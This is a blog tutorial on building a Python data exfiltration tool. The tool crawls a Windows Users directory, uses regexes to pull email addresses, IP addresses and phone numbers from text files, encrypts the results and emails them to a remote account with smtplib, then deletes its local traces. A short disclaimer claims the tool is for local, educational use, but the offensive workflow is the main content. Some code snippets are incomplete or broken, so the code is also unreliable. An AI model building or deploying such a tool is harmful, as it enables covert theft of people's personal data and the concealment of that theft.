Building a Python data exfiltration tool

This tutorial explains how I created a hard drive crawler and extraction tool. This Python data exfiltration tool uses regex for matching desired data patterns while scanning through specified file extensions.

Similar to my Advanced Keylogger project, I designed this to be used on the local host to prevent nefarious use. Unethical use of this program is strictly prohibited, though it demonstrates the necessity of secure encrypted storage for sensitive information.

Storing sensitive information on an external hard drive (preferably encrypted) is the best method of secure private storage.

Anything connected to a network always has the potential to be accessed from remote nefarious sources.

With that said, let’s get started!

Getting started with the data exfiltration tool

First off, make sure you get my code at, and make sure to read the instructions thoroughly.

The program starts at line 113 of the file with the main function in a try-except statement. The purpose of this is to run the main function unless a keyboard interrupt is detected or an error occurs, which results in logging the error & proceeding.

Main function block of the python data exfiltration tool

Now, let’s take a closer look at the main section of the code.

Recursive hard drive crawler

The crawler begins at line 11, starting up the timer from the time module for testing the program’s execution speed.

from time import time

def main():
    start = time()

Then it creates a directory in the specified path, sets that path as a variable, and establishes the variables of compiled regex patterns.

    pathlib.Path('C:/Tmp').mkdir(parents=True, exist_ok=True)
    path = 'C:\\Tmp\\'
    re_txt = re.compile(r'.+\.txt$')
    re_email = re.compile(r'^.+@(?:gmail|yahoo|hotmail|aol|msn|live|protonmail)\.com')
    re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
    re_phone = re.compile(r'(1?)(?:\s|^)[0-9]{3}-[0-9]{3}-[0-9]{4}')

Once necessary variables & logging are set, the crawling can begin!

Crawling logic

I start by initiating a context manager which will open the log file and automatically close the file when that code block ends at line 50. Anything within the indented block of code can be written to that file.

Considering different information will be logged many times, this approach is more ideal than constantly opening and closing the file.

Now that the log file is open, it’s time to use the walk procedure of the OS module for recursive access to the file system.

Line 22 is where the os.walk is set to the Users directory. This is ideal considering this directory tree is where users typically store all of their data.

for dirpath, dirnames, filenames in os.walk('C:\\Users\\', topdown=True):

The part for dirpath, dirnames, filenames is set as different values of the tuple so 1-3 options can be selected.

Here is how the crawler walks:

  • Log the path of the directories (log.write('Path => {}\n'.format(dirpath)))
  • Iterate through the directory names in the path and log them (for d in dirnames:)
  • For loop that iterates through the file names in the path and logs them (for file in filenames:)
    • If regex matches the file extension compiled in the pattern (if re_txt.match(file):)
      • Open the file and search through the file line by line
        • If regex matches one of the patterns (ip address, emails, or phone number), write the match with the path and file name to a separate log

You might notice lines 40-44 look similar to what was applied in the global sections in the introduction. It is the same logging code applied globally.

except Exception as ex:
    logging.basicConfig(level=logging.DEBUG, \
    logging.exception('* Error Occured: {} *'.format(ex))

The crawler produces an error every time it tries to access a file with elevated permissions. Normally the global logging would suffice even if multiple errors are raised. Considering how quickly the crawler moves through the files; it’s possible threshold is set if multiple errors occur within a few seconds of each other.

After experimenting, the solution was to add another logging try-except block within the loop to prevent the program from exiting.

Encrypting the data

Considering that most email services are unencrypted, I decided to encrypt the data as well as hash it before & after the process for assured integrity.
The encryption process:

  • Use the os.walk procedure to access the directory that was created to store the log files
  • For loop that iterates over each of the files in the specified path
  • Generates SHA512 hash of the plain text data and logs to file
  • Reads the plain text, uses key to then encrypt the data
  • Generates SHA512 hash of the encrypted data and logs to file
  • Uses a separate key to encrypt the file containing all the hash information
Encryption logic

Emailing the data

At this point the encrypted logged data is ready to send to the specified email account (lines 78-79).

The MIMEMultipart procedure is set as a variable, and then messages fields like To, From, & Subject are set.

    msg = MIMEMultipart()
    msg['From'] = email_address
    msg['To'] =  email_address
    msg['Subject'] = 'Success!!!'

Then, the same directory with the encrypted logs is iterated over again with the os.walk procedure.

If the files in the directory match the encrypted file regex pattern, they will be attached to the message.

if re_email.match(file):
     p = MIMEBase('application', 'octet-stream')
     with open(path + file, 'rb') as attachment:
     p.add_header('Content-Disposition', 'attachment;'   
                        'filename = {}'.format(file)) 

The smtplib establishes the email provider and the TCP port for transport to finally transfer the data to the email account.

    s = smtplib.SMTP('', 587)
    s.login(email_address, password)
    s.sendmail(email_address, email_address, msg.as_string())
Email logic

Cleaning up

The data exfiltration tool program finishes up by shutting down the logging initially set and removing the created directory with all the logged contents.

There is no need to keep the data on the machine locally when it is now stored in a email account.

Finally it should tell how long it took to complete the entire process. On my system, it took around 45 seconds based on the amount of .txt data.

The overall execution time varies based on the scope of the file system that is being searched, the file extensions it matches, and how many files it matches.

Cleanup logic for the data exfiltration tool

That’s about it for this program, though it could be easily turned into a general search tool using a regex library for finding specific data FAST.

Hope you enjoyed it! If you did, you’ll probably also enjoy reading about my Advanced Python Keylogger.

Related Articles


Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.